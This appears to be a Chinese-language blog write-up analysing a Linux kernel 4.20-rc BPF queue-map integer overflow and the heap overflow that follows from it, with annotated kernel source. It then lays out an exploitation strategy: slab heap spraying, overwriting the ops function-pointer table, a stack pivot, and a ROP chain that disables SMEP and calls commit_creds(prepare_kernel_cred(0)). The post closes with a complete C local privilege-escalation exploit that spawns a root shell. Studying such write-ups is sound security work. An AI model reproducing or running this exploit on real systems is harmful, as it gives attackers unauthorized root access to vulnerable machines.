Linux kernel 4.20 BPF 整数溢出漏洞分析

Linux kernel 4.20 BPF 整数溢出漏洞分析

该漏洞的发现者是ww9210师傅
漏洞影响的范围是Linux Kernel 4.20rc1-4.20rc4,主要Linux发行版并不受其影响。
基于linux-4.20-rc3版本代码:https://elixir.bootlin.com/linux/v4.20-rc3/source
这里主要参考P4nda师傅、钞sir师傅和bsauce师傅写的漏洞分析报告,十分感谢师傅们。

漏洞模块

漏洞主要存在于BPF模块中,该模块是于支持用户状态自定义包过滤方法的内核模块,是数据链路层的一种原始接口

漏洞分析

主要的漏洞即存在于map_create()和map_update_elem()中其中主要的参数是attr

SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr __user *, uattr, unsigned int, size)
{
	union bpf_attr attr = {};
	int err;

	if (sysctl_unprivileged_bpf_disabled && !capable(CAP_SYS_ADMIN))
		return -EPERM;

	err = bpf_check_uarg_tail_zero(uattr, sizeof(attr), size);
	if (err)
		return err;
	size = min_t(u32, size, sizeof(attr));

	/* copy attributes from user space, may be less than sizeof(bpf_attr) */
	if (copy_from_user(&attr, uattr, size) != 0)
		return -EFAULT;

	err = security_bpf(cmd, &attr, size);
	if (err < 0)
		return err;

	switch (cmd) {
	case BPF_MAP_CREATE:       //整数溢出漏洞
		err = map_create(&attr);
		break;
	case BPF_MAP_LOOKUP_ELEM:
		err = map_lookup_elem(&attr);
		break;
	case BPF_MAP_UPDATE_ELEM:
		err = map_update_elem(&attr);   //堆溢出漏洞
		break;
	case BPF_MAP_DELETE_ELEM:
		err = map_delete_elem(&attr);
		break;
	case BPF_MAP_GET_NEXT_KEY:
		err = map_get_next_key(&attr);
		break;
		.......
}

bpf_attr的联合体,注意不同的函数调用会产生不同的结构体。

union bpf_attr {
	struct { /* 调用map_create()的话,attr的结构体 */
		__u32	map_type;	/* one of enum bpf_map_type */
		__u32	key_size;	/* size of key in bytes */
		__u32	value_size;	/* size of value in bytes */
		__u32	max_entries;	/* max number of entries in a map */
		__u32	map_flags;	/* BPF_MAP_CREATE related
					 * flags defined above.
					 */
		__u32	inner_map_fd;	/* fd pointing to the inner map */
		__u32	numa_node;	/* numa node (effective only if
					 * BPF_F_NUMA_NODE is set).
					 */
		char	map_name[BPF_OBJ_NAME_LEN];
		__u32	map_ifindex;	/* ifindex of netdev to create on */
		__u32	btf_fd;		/* fd pointing to a BTF type data */
		__u32	btf_key_type_id;	/* BTF type_id of the key */
		__u32	btf_value_type_id;	/* BTF type_id of the value */
	};

	struct { /* 调用map_update_elem()的话,attr的结构体是这个 */
		__u32		map_fd;
		__aligned_u64	key;
		union {
			__aligned_u64 value;
			__aligned_u64 next_key;
		};
		__u64		flags;
	};
	.......
}

整数溢出漏洞

1.进入map_create函数看一下,发现find_and_alloc_map()函数创建了一个map结构体

static int map_create(union bpf_attr *attr)
{
	int numa_node = bpf_map_attr_numa_node(attr);
	struct bpf_map *map;
	int f_flags;
	int err;

	err = CHECK_ATTR(BPF_MAP_CREATE);
	if (err)
		return -EINVAL;

	f_flags = bpf_get_file_flag(attr->map_flags);
	if (f_flags < 0)
		return f_flags;

	if (numa_node != NUMA_NO_NODE &&
	    ((unsigned int)numa_node >= nr_node_ids ||
	     !node_online(numa_node)))
		return -EINVAL;

	/* find map type and init map: hashtable vs rbtree vs bloom vs ... */
	map = find_and_alloc_map(attr);    //这里面申请了map
	if (IS_ERR(map))
		return PTR_ERR(map);

	err = bpf_obj_name_cpy(map->name, attr->map_name);
	if (err)
		goto free_map_nouncharge;

	atomic_set(&map->refcnt, 1);
	atomic_set(&map->usercnt, 1);

	if (attr->btf_key_type_id || attr->btf_value_type_id) {
		struct btf *btf;

		if (!attr->btf_key_type_id || !attr->btf_value_type_id) {
			err = -EINVAL;
			goto free_map_nouncharge;
		}

		btf = btf_get_by_fd(attr->btf_fd);
		if (IS_ERR(btf)) {
			err = PTR_ERR(btf);
			goto free_map_nouncharge;
		}

		err = map_check_btf(map, btf, attr->btf_key_type_id,
				    attr->btf_value_type_id);
		if (err) {
			btf_put(btf);
			goto free_map_nouncharge;
		}

		map->btf = btf;
		map->btf_key_type_id = attr->btf_key_type_id;
		map->btf_value_type_id = attr->btf_value_type_id;
	}

	err = security_bpf_map_alloc(map);
	if (err)
		goto free_map_nouncharge;

	err = bpf_map_init_memlock(map);
	if (err)
		goto free_map_sec;

	err = bpf_map_alloc_id(map);
	if (err)
		goto free_map;

	err = bpf_map_new_fd(map, f_flags);
	if (err < 0) {
		/* failed to allocate fd.
		 * bpf_map_put() is needed because the above
		 * bpf_map_alloc_id() has published the map
		 * to the userspace and the userspace may
		 * have refcnt-ed it through BPF_MAP_GET_FD_BY_ID.
		 */
		bpf_map_put(map);
		return err;
	}

	return err;

free_map:
	bpf_map_release_memlock(map);
free_map_sec:
	security_bpf_map_free(map);
free_map_nouncharge:
	btf_put(map->btf);
	map->ops->map_free(map);
	return err;
}

bpf_map结构体

struct bpf_map {
	/* The first two cachelines with read-mostly members of which some
	 * are also accessed in fast-path (e.g. ops, max_entries).
	 */
	const struct bpf_map_ops *ops ____cacheline_aligned;  //ops是指向虚函数表的指针画重点
	struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
	void *security;
#endif
	enum bpf_map_type map_type;
	u32 key_size;
	u32 value_size;
	u32 max_entries;
	u32 map_flags;
	u32 pages;
	u32 id;
	int numa_node;
	u32 btf_key_type_id;
	u32 btf_value_type_id;
	struct btf *btf;
	bool unpriv_array;
	/* 55 bytes hole */

	/* The 3rd and 4th cacheline with misc members to avoid false sharing
	 * particularly with refcounting.
	 */
	struct user_struct *user ____cacheline_aligned;
	atomic_t refcnt;
	atomic_t usercnt;
	struct work_struct work;
	char name[BPF_OBJ_NAME_LEN];
};

注意这儿主要用到的几个结构是:

struct {    /* Used by BPF_MAP_CREATE */
		__u32         map_type;
		__u32         key_size;    
		__u32         value_size;  
		__u32         max_entries; /* map中最大的数量 */
};

enum bpf_map_type {
	BPF_MAP_TYPE_UNSPEC,
	BPF_MAP_TYPE_HASH,
	BPF_MAP_TYPE_ARRAY,
	BPF_MAP_TYPE_PROG_ARRAY,
	BPF_MAP_TYPE_PERF_EVENT_ARRAY,
	BPF_MAP_TYPE_PERCPU_HASH,
	BPF_MAP_TYPE_PERCPU_ARRAY,
	BPF_MAP_TYPE_STACK_TRACE,
	BPF_MAP_TYPE_CGROUP_ARRAY,
	BPF_MAP_TYPE_LRU_HASH,
	BPF_MAP_TYPE_LRU_PERCPU_HASH,
	BPF_MAP_TYPE_LPM_TRIE,
	BPF_MAP_TYPE_ARRAY_OF_MAPS,
	BPF_MAP_TYPE_HASH_OF_MAPS,
	BPF_MAP_TYPE_DEVMAP,
	BPF_MAP_TYPE_SOCKMAP,
	BPF_MAP_TYPE_CPUMAP,
	BPF_MAP_TYPE_XSKMAP,
	BPF_MAP_TYPE_SOCKHASH,
	BPF_MAP_TYPE_CGROUP_STORAGE,
	BPF_MAP_TYPE_REUSEPORT_SOCKARRAY,
	BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE,
	BPF_MAP_TYPE_QUEUE,
	BPF_MAP_TYPE_STACK,
	BPF_MAP_TYPE_SK_STORAGE,
	BPF_MAP_TYPE_DEVMAP_HASH,
};

2.打开find_and_alloc_map()函数主要是使用ops虚函数表中的map_create函数,ops是存放在map结构体中的一个虚函数表。这里需要注意一点,虽说表面上是map_create,其实是queue_stack_map_alloc()函数。这点被写在了一个结构体里面。

static struct bpf_map *find_and_alloc_map(union bpf_attr *attr)
{
	const struct bpf_map_ops *ops;
	u32 type = attr->map_type;
	struct bpf_map *map;
	int err;

	if (type >= ARRAY_SIZE(bpf_map_types))
		return ERR_PTR(-EINVAL);
	type = array_index_nospec(type, ARRAY_SIZE(bpf_map_types));
	ops = bpf_map_types[type];         //虚函数表根据map的类型来设置对应的函数
	if (!ops)
		return ERR_PTR(-EINVAL);

	if (ops->map_alloc_check) {
		err = ops->map_alloc_check(attr);
		if (err)
			return ERR_PTR(err);
	}
	if (attr->map_ifindex)
		ops = &bpf_map_offload_ops;
	map = ops->map_alloc(attr);    //由查看我列的结构体可以知道实际调用函数
	if (IS_ERR(map))
		return map;
	map->ops = ops;
	map->map_type = type;
	return map;
}

ops虚函数表

struct bpf_map_ops {
	/* funcs callable from userspace (via syscall) */
	int (*map_alloc_check)(union bpf_attr *attr);
	struct bpf_map *(*map_alloc)(union bpf_attr *attr);
	void (*map_release)(struct bpf_map *map, struct file *map_file);
	void (*map_free)(struct bpf_map *map);
	int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
	void (*map_release_uref)(struct bpf_map *map);

	/* funcs callable from userspace and from eBPF programs */
	void *(*map_lookup_elem)(struct bpf_map *map, void *key);
	int (*map_update_elem)(struct bpf_map *map, void *key, void *value, u64 flags);
	int (*map_delete_elem)(struct bpf_map *map, void *key);
	int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
	int (*map_pop_elem)(struct bpf_map *map, void *value);
	int (*map_peek_elem)(struct bpf_map *map, void *value);

	/* funcs called by prog_array and perf_event_array map */
	void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
				int fd);
	void (*map_fd_put_ptr)(void *ptr);
	u32 (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
	u32 (*map_fd_sys_lookup_elem)(void *ptr);
	void (*map_seq_show_elem)(struct bpf_map *map, void *key,
				  struct seq_file *m);
	int (*map_check_btf)(const struct bpf_map *map,
			     const struct btf_type *key_type,
			     const struct btf_type *value_type);
};

注意struct bpf_map中的type字段要是BPF_MAP_TYPE_QUEUE,才可以触发漏洞。

BPF_MAP_TYPE(BPF_MAP_TYPE_QUEUE, queue_map_ops)

map_create()和queue_stack_map_alloc()相关的结构体

const struct bpf_map_ops queue_map_ops = {
	.map_alloc_check = queue_stack_map_alloc_check,
	.map_alloc = queue_stack_map_alloc,
	.map_free = queue_stack_map_free,
	.map_lookup_elem = queue_stack_map_lookup_elem,
	.map_update_elem = queue_stack_map_update_elem,
	.map_delete_elem = queue_stack_map_delete_elem,
	.map_push_elem = queue_stack_map_push_elem,
	.map_pop_elem = queue_map_pop_elem,
	.map_peek_elem = queue_map_peek_elem,
	.map_get_next_key = queue_stack_map_get_next_key,
};

3.所以进入queue_stack_map_alloc()来看看,这也是整数溢出漏洞所在的地方,涉及到bpf_queue_stack结构体。
这里我们发现在下面[1]中,计算大小时是由qs结构体的大小加上value的数量乘以大小,由于max_entries 的类型是u32,只占4个字节数且为可控输入,即我们将其填充为0xffffffff时,size=max_entries+1即会溢出,使得size为0,那么在[2]中申请大小时,qs就只申请了自己结构体的大小,那么申请的堆空间就会过小。

static struct bpf_map *queue_stack_map_alloc(union bpf_attr *attr)
{
	int ret, numa_node = bpf_map_attr_numa_node(attr);
	struct bpf_queue_stack *qs;
	u32 size, value_size;
	u64 queue_size, cost;

	size = attr->max_entries + 1;            //<---这里
	value_size = attr->value_size;

	queue_size = sizeof(*qs) + (u64) value_size * size;  //[1]

	cost = queue_size;
	if (cost >= U32_MAX - PAGE_SIZE)
		return ERR_PTR(-E2BIG);

	cost = round_up(cost, PAGE_SIZE) >> PAGE_SHIFT;

	ret = bpf_map_precharge_memlock(cost);
	if (ret < 0)
		return ERR_PTR(ret);

	qs = bpf_map_area_alloc(queue_size, numa_node);    //[2]
	if (!qs)
		return ERR_PTR(-ENOMEM);

	memset(qs, 0, sizeof(*qs));

	bpf_map_init_from_attr(&qs->map, attr);     //初始化qs->map

	qs->map.pages = cost;
	qs->size = size;

	raw_spin_lock_init(&qs->lock);

	return &qs->map;
}

bpf_queue_stack结构体

struct bpf_queue_stack {
	struct bpf_map map;
	raw_spinlock_t lock;
	u32 head, tail;
	u32 size; /* max_entries + 1 */

	char elements[0] __aligned(8);
};

raw_spin_lock_init()是个初始化函数

void bpf_map_init_from_attr(struct bpf_map *map, union bpf_attr *attr)
{
	map->map_type = attr->map_type;
	map->key_size = attr->key_size;
	map->value_size = attr->value_size;
	map->max_entries = attr->max_entries;
	map->map_flags = attr->map_flags;
	map->numa_node = bpf_map_attr_numa_node(attr);
}

堆溢出漏洞

1.现在我们知道有一个我们申请了一个过小的堆,且value的大小是我们输入的,那么在每一个value更新的时候,就可能出现问题。查看我们的BPF模块,发现了map_update_elem()函数。主要逻辑就是申请value堆块,然后添加进map中,注意这里attr的结构体于上面的函数调用时不同。

static int map_update_elem(union bpf_attr *attr)
{
	void __user *ukey = u64_to_user_ptr(attr->key);
	void __user *uvalue = u64_to_user_ptr(attr->value);
	int ufd = attr->map_fd;   //用来确定map的编号
	struct bpf_map *map;
	void *key, *value;
	u32 value_size;
	struct fd f;
	int err;

	if (CHECK_ATTR(BPF_MAP_UPDATE_ELEM))
		return -EINVAL;

	f = fdget(ufd);
	map = __bpf_map_get(f);
	if (IS_ERR(map))
		return PTR_ERR(map);

	if (!(f.file->f_mode & FMODE_CAN_WRITE)) {
		err = -EPERM;
		goto err_put;
	}

	key = __bpf_copy_key(ukey, map->key_size);
	if (IS_ERR(key)) {
		err = PTR_ERR(key);
		goto err_put;
	}

	if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH ||
	    map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH ||
	    map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY ||
	    map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE)
		value_size = round_up(map->value_size, 8) * num_possible_cpus();
	else
		value_size = map->value_size;

	err = -ENOMEM;
	value = kmalloc(value_size, GFP_USER | __GFP_NOWARN);   //申请了value的一片空间
	if (!value)
		goto free_key;

	err = -EFAULT;
	if (copy_from_user(value, uvalue, value_size) != 0)  //从用户空间中把uvalue覆盖到了value上。
		goto free_value;

	/* Need to create a kthread, thus must support schedule */
	if (bpf_map_is_dev_bound(map)) {
		err = bpf_map_offload_update_elem(map, key, value, attr->flags);
		goto out;
	} else if (map->map_type == BPF_MAP_TYPE_CPUMAP ||
		   map->map_type == BPF_MAP_TYPE_SOCKHASH ||
		   map->map_type == BPF_MAP_TYPE_SOCKMAP) {
		err = map->ops->map_update_elem(map, key, value, attr->flags);
		goto out;
	}

	/* must increment bpf_prog_active to avoid kprobe+bpf triggering from
	 * inside bpf map update or delete otherwise deadlocks are possible
	 */
	preempt_disable();
	__this_cpu_inc(bpf_prog_active);
	if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH ||
	    map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH) {
		err = bpf_percpu_hash_update(map, key, value, attr->flags);
	} else if (map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY) {
		err = bpf_percpu_array_update(map, key, value, attr->flags);
	} else if (map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE) {
		err = bpf_percpu_cgroup_storage_update(map, key, value,
						       attr->flags);
	} else if (IS_FD_ARRAY(map)) {
		rcu_read_lock();
		err = bpf_fd_array_map_update_elem(map, f.file, key, value,
						   attr->flags);
		rcu_read_unlock();
	} else if (map->map_type == BPF_MAP_TYPE_HASH_OF_MAPS) {
		rcu_read_lock();
		err = bpf_fd_htab_map_update_elem(map, f.file, key, value,
						  attr->flags);
		rcu_read_unlock();
	} else if (map->map_type == BPF_MAP_TYPE_REUSEPORT_SOCKARRAY) {
		/* rcu_read_lock() is not needed */
		err = bpf_fd_reuseport_array_update_elem(map, key, value,
							 attr->flags);
	} else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
		   map->map_type == BPF_MAP_TYPE_STACK) {
		err = map->ops->map_push_elem(map, value, attr->flags);  //这个时候,发现了一个map_push_elem函数,去看看上面ops的结构体。
	} else {
		rcu_read_lock();
		err = map->ops->map_update_elem(map, key, value, attr->flags);
		rcu_read_unlock();
	}
	__this_cpu_dec(bpf_prog_active);
	preempt_enable();
	maybe_wait_bpf_programs(map);
out:
free_value:
	kfree(value);
free_key:
	kfree(key);
err_put:
	fdput(f);
	return err;
}

2.看了ops的结构体,map_push_elem对应的就是queue_stack_map_push_elem函数,所以关键漏洞函数queue_stack_map_push_elem()出现了。就是往struct bpf_queue_stack后面不断加东西。。。。。。。
由分析可以推测map(struct bpf_queue_stack的第一个字段)应该是用来管理多个堆块的结构体像是一个报文头??哈哈。其中value_size是每一个小块的大小,max_entries是小块的数量,每次可以写一个小块内容。而qs中包含了map结构体还有elements这个参数来记录下一个可插入块的编号,所以1号位置,用(最初位置+编号数量*每块大小)计算出了当前可插入块的位置,由于上面的整数溢出,我们的qs是只分配了一个存qs结构体大小的堆块,所以当可控块value_size > 256 - (&qs->elements - &qs)就会发生越界拷贝,造成了堆溢出。

static int queue_stack_map_push_elem(struct bpf_map *map, void *value,
				     u64 flags)
{
	struct bpf_queue_stack *qs = bpf_queue_stack(map);
	unsigned long irq_flags;
	int err = 0;
	void *dst;

	/* BPF_EXIST is used to force making room for a new element in case the
	 * map is full
	 */
	bool replace = (flags & BPF_EXIST);

	/* Check supported flags for queue and stack maps */
	if (flags & BPF_NOEXIST || flags > BPF_EXIST)
		return -EINVAL;

	raw_spin_lock_irqsave(&qs->lock, irq_flags);

	if (queue_stack_map_is_full(qs)) {
		if (!replace) {
			err = -E2BIG;
			goto out;
		}
		/* advance tail pointer to overwrite oldest element */
		if (unlikely(++qs->tail >= qs->size))
			qs->tail = 0;
	}

	dst = &qs->elements[qs->head * qs->map.value_size];   //1
	memcpy(dst, value, qs->map.value_size);     //此处发生堆溢出,越界拷贝

	if (unlikely(++qs->head >= qs->size))
		qs->head = 0;

out:
	raw_spin_unlock_irqrestore(&qs->lock, irq_flags);
	return err;
}

漏洞利用思路

这边我们仅讨论绕过semp保护达成提权的方法。
1.首先确定每一次create的堆的大小,调试可知是0x100

pwndbg> x/40gx 0xffff88800fa2b500
0xffff88800fa2b500:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b510:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b520:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b530:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b540:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b550:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b560:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b570:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b580:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b590:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b5a0:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b5b0:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b5c0:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b5d0:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b5e0:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b5f0:	0x0000000000000000	0x0000000000000000
0xffff88800fa2b600:	0xffff88800f9a1980	0x0000000000000000
0xffff88800fa2b610:	0xffff88800f4a2640	0xffff88800fa2b618
0xffff88800fa2b620:	0xffff88800fa2b618	0x0000000200000000
0xffff88800fa2b630:	0x0000000000000000	0xffffffff82107d20

2.由于内核的堆管理是用的伙伴算法+slub算法,即相同kmem_cache的内存块是用同一个内存页切开的,那么我们大量分配同样大小的堆(也就是喷射),总有一块堆会和我们最初分配的堆相邻,因为我们有一个整数溢出,溢出长度可控,且经过调试我们知道,由于需要对齐,所以0x100-0xd0(buf_queue_stack的长度)=0x30,所以溢出位置是0x30,超过0x30即可覆盖虚函数表。
ops虚函数表如下

struct bpf_map_ops {
	/* funcs callable from userspace (via syscall) */
	int (*map_alloc_check)(union bpf_attr *attr);
	struct bpf_map *(*map_alloc)(union bpf_attr *attr);
	void (*map_release)(struct bpf_map *map, struct file *map_file);
	void (*map_free)(struct bpf_map *map);
	int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
	void (*map_release_uref)(struct bpf_map *map);

	/* funcs callable from userspace and from eBPF programs */
	void *(*map_lookup_elem)(struct bpf_map *map, void *key);
	int (*map_update_elem)(struct bpf_map *map, void *key, void *value, u64 flags);
	int (*map_delete_elem)(struct bpf_map *map, void *key);
	int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
	int (*map_pop_elem)(struct bpf_map *map, void *value);
	int (*map_peek_elem)(struct bpf_map *map, void *value);

	/* funcs called by prog_array and perf_event_array map */
	void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
				int fd);
	void (*map_fd_put_ptr)(void *ptr);
	u32 (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
	u32 (*map_fd_sys_lookup_elem)(void *ptr);
	void (*map_seq_show_elem)(struct bpf_map *map, void *key,
				  struct seq_file *m);
	int (*map_check_btf)(const struct bpf_map *map,
			     const struct btf_type *key_type,
			     const struct btf_type *value_type);
};

3.全部都是指针,所以我们可以使用堆溢出来覆盖一个函数指针为一段gadget,来控制rsp到我们伪造的虚函数表中即栈迁移,然后继续执行我们的rop链。
这里我们采用的偏移函数是:

   0xffffffff81954dc8:	xchg   esp,eax
   0xffffffff81954dc9:	ret    0x674

所以我们的rop链需要布置在0x81954dc8+0x674后面。Rop链就是我们平常使用的使用先覆盖cr4,使保护失效,随即部署

commit_creds(prepare_kernel_cred(0))

来进行权限提升,最后iretq返回用户空间即可。

exp

这里是我重写的exp,基本没什么变动,主要是加了些注释,方便理解整个exp的流程。这里不得不说,P4nda师傅的exp写的很棒。基本思路是利用整数溢出和堆喷射来创建出很多堆块,根据linux的内存分配规则,kmem_cache是kmalloc-256,所以一个物理页可以有相邻的堆块,通过堆溢出来覆盖后面堆块的ops虚函数表(map_release()),那么大概率我们可以在close()的时候,触发漏洞。

#define _GNU_SOURCE
#define SPRAY_NUMBER 14

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define native_write_cr4 0xffffffff810037d5// 0xffffffff81097fcc
#define POPRDX 0xffffffff81002dda
#define DUMMY 0
#define PREPARE_KERNEL_CRED 0xFFFFFFFF810E3D40 //0xffffffff810e3670
#define COMMIT_CREDS  0xFFFFFFFF810E3AB0 //0xffffffff810e33e0
#define poprdiret 0xffffffff810013b9
#define popraxret 0xffffffff81029c71
#define swapgs 0xffffffff81c00d5a//0xffffffff81c0095f
#define iretq 0xffffffff8106d8f4
#define stack_pivot_gadget 0xffffffff81954dc8
#define stack_top_offset 0x674
#define krop_base_to_map 0x81954000
int rop_start=0x81954dc8-0x81954000+0x674;       //krop_base_mapped离rop_chain的距离
void* krop_base_mapped;

unsigned long user_cs, user_ss, user_rflags;

static void save_state()
{
    asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "pushfq\n"
        "popq %2\n"
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags)
        :
        : "memory");
}

void get_shell()
{
    system("id");
    char *shell = "/bin/sh";
    char *args[] = {shell, NULL};
    execve(shell, args, NULL);
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

void get_root_payload(void)
{
    commit_creds(prepare_kernel_cred(0));
}
unsigned long rop_chain[] = {
    popraxret,
    0x6f0,             //通用的覆盖cr4的值,解除smep保护
    0xffffffff81001c51,//native_write_cr4,
    poprdiret,
    0,
    PREPARE_KERNEL_CRED,
    0xffffffff81001c50, //: pop rsi ; ret
    poprdiret,
    0xffffffff81264e0b,//: push rax; push rsi; ret; //0xffffffff812646fb, //: push rax ; push rsi ; ret
    COMMIT_CREDS,
    swapgs,
    0x246,
    iretq,
    (unsigned long)&get_shell,
    0,//user_cs,
    0,//user_rflags,
    0,//krop_base_mapped + 0x4000,
    0//user_ss
};

void * fakestack;
void prepare_krop(){
    krop_base_mapped=mmap((void *)krop_base_to_map,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
    if (krop_base_mapped<0){
        perror("mmap failed");
    }
    fakestack=mmap((void *)0xa000000000,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
    *(unsigned long*)0x0000000081954dc8=popraxret;
    *(unsigned long*)krop_base_to_map = 0;
    *(unsigned long*)(krop_base_to_map+0x1000) = 0;     //这里把每一页的的第一个地址赋予0了
    *(unsigned long*)(krop_base_to_map+0x2000) = 0;
    *(unsigned long*)(krop_base_to_map+0x3000) = 0;
    *(unsigned long*)(krop_base_to_map+0x4000) = 0;
    *(unsigned long*)(krop_base_to_map+0x5000) = 0;
    *(unsigned long*)(krop_base_to_map+0x6000) = 0;
    *(unsigned long*)(krop_base_to_map+0x7000) = 0;
    *(unsigned long*)(fakestack+0x4000) = 0;
    *(unsigned long*)(fakestack+0x3000) = 0;
    *(unsigned long*)(fakestack+0x2000) = 0;
    *(unsigned long*)(fakestack+0x1000) = 0;
    *(unsigned long*)(fakestack) = 0;
    *(unsigned long*)(fakestack+0x10) = stack_pivot_gadget;        //正好对应虚函数的map_release()偏移。这段代码由于是xchg   esp,eax,所以只有后面4个字节,即0x81954dc8变成了esp。就迁移成功
    *(unsigned long*)(fakestack+0x7000) = 0;
    *(unsigned long*)(fakestack+0x6000) = 0;
    *(unsigned long*)(fakestack+0x5000) = 0;
    rop_chain[12+2]=user_cs;
    rop_chain[13+2]=user_rflags;
    rop_chain[14+2]=(unsigned long)(fakestack + 0x6000);
    rop_chain[15+2]=user_ss;
    memcpy(krop_base_mapped+rop_start,rop_chain,sizeof(rop_chain)); //由于我们的栈迁移函数,所以被抬高了0x674,需要从0x81954dc8+0x674开始写rop-chain
    puts("rop_payload_initialized");
}

#ifndef __NR_bpf
#define __NR_bpf 321
#endif

uint64_t r[1] = {0xffffffffffffffff};

// defragmentation,这个函数不怎么懂,师傅的exp上有,就写上了。。。
void defragment(){
    int i;
    FILE* fp;
    char name[100];
    for(i=0; i<200; i++){
        snprintf(name, 100, "xxx%d", i);
        fp=fopen(name,"w");
    }
}

long victim[SPRAY_NUMBER];
//这边是喷射,用来获得相邻堆块
void spray(){
    int i;
    for(i=0;i<SPRAY_NUMBER;i++){
        victim[i] = syscall(__NR_bpf, 0, 0x200011c0, 0x2c);     //利用struct bpf_attr来堆喷射很多的堆块,每个堆块都是整数溢出的。
    }
    return;
}
void get_shell_again(){
  puts("SIGSEGV found");
  puts("get shell again");
  system("id");
  char *shell = "/bin/sh";
  char *args[] = {shell, NULL};
  execve(shell, args, NULL);
}
int main(void)
{
  signal(SIGSEGV,get_shell_again);  //遇到SIGSEGV错误时调用get_shell_again()处理函数(对存储的无效访问:当程序试图在已分配的内存之外读取或写入时)
  //get_shell();
  syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);  //申请了0x20000000到0x30000000这块地址空间
  long res = 0;
    //构造了一个联合体bpf_attr中的第一个结构体
  *(uint32_t*)0x200011c0 = 0x17;   //触发queue_stack_map_alloc所需要的type类型 
  *(uint32_t*)0x200011c4 = 0;      //key值
  *(uint32_t*)0x200011c8 = 0x40;   //value_size用来记录value的大小,主要是为了后面0x200000c0堆块的大小
  *(uint32_t*)0x200011cc = -1;     //就是0xffffffff
  *(uint32_t*)0x200011d0 = 0;
  *(uint32_t*)0x200011d4 = -1;
  *(uint32_t*)0x200011d8 = 0;
  *(uint8_t*)0x200011dc = 0;
  *(uint8_t*)0x200011dd = 0;
  *(uint8_t*)0x200011de = 0;
  *(uint8_t*)0x200011df = 0;
  *(uint8_t*)0x200011e0 = 0;
  *(uint8_t*)0x200011e1 = 0;
  *(uint8_t*)0x200011e2 = 0;
  *(uint8_t*)0x200011e3 = 0;
  *(uint8_t*)0x200011e4 = 0;
  *(uint8_t*)0x200011e5 = 0;
  *(uint8_t*)0x200011e6 = 0;
  *(uint8_t*)0x200011e7 = 0;
  *(uint8_t*)0x200011e8 = 0;
  *(uint8_t*)0x200011e9 = 0;
  *(uint8_t*)0x200011ea = 0;
  *(uint8_t*)0x200011eb = 0;
  save_state();    //保存当前的寄存器值,后面用来切回用户空间
  printf("user_cs:%llx   user_ss: %llx\n",user_cs,user_ss);
  prepare_krop();
  res = syscall(__NR_bpf, 0, 0x200011c0, 0x2c);  //这里是整数溢出,这个是用来覆盖的堆块,就等堆喷在这个堆块下面分配一个堆块
  if (res != -1)
    r[0] = res;
  spray();
     //这个是联合体bpf_attr中的第二个结构体
  *(uint32_t*)0x200000c0 = r[0];    //就是上面syscall的返回值,map的id,用来确定是哪个map
  *(uint64_t*)0x200000c8 = 0;
  *(uint64_t*)0x200000d0 = 0x20000140;   //value的地址,也就是我们覆盖的地方
  *(uint64_t*)0x200000d8 = 2;
  uint64_t* ptr = (uint64_t*)0x20000140;   //注意是0x30之后才开始的覆盖,虽然ops是第一个字段,但是要基于0x100对齐,kmalloc-256.
  ptr[0]=1;
  ptr[1]=2;
  ptr[2]=3;
  ptr[3]=4;
  ptr[4]=5;
  ptr[5]=6;
  ptr[6]=0xa000000000;             //我们伪造的fakestack,注意虚函数的结构。
  ptr[7]=8;
  syscall(__NR_bpf, 2, 0x200000c0, 0x20);   //这里是堆溢出,注意我们的attr是不同的
  int i;
  *(unsigned long*)(fakestack+0x7000) = 0;
  *(unsigned long*)(fakestack+0x6000) = 0;
  *(unsigned long*)(fakestack+0x5000) = 0;
  for(i=0;i<SPRAY_NUMBER;i++){              //关闭所有的,触发漏洞(我们覆盖的map_release()),大概率成功
      close(victim[i]);
  }
  //pause();
  return 0;
}

一些问题

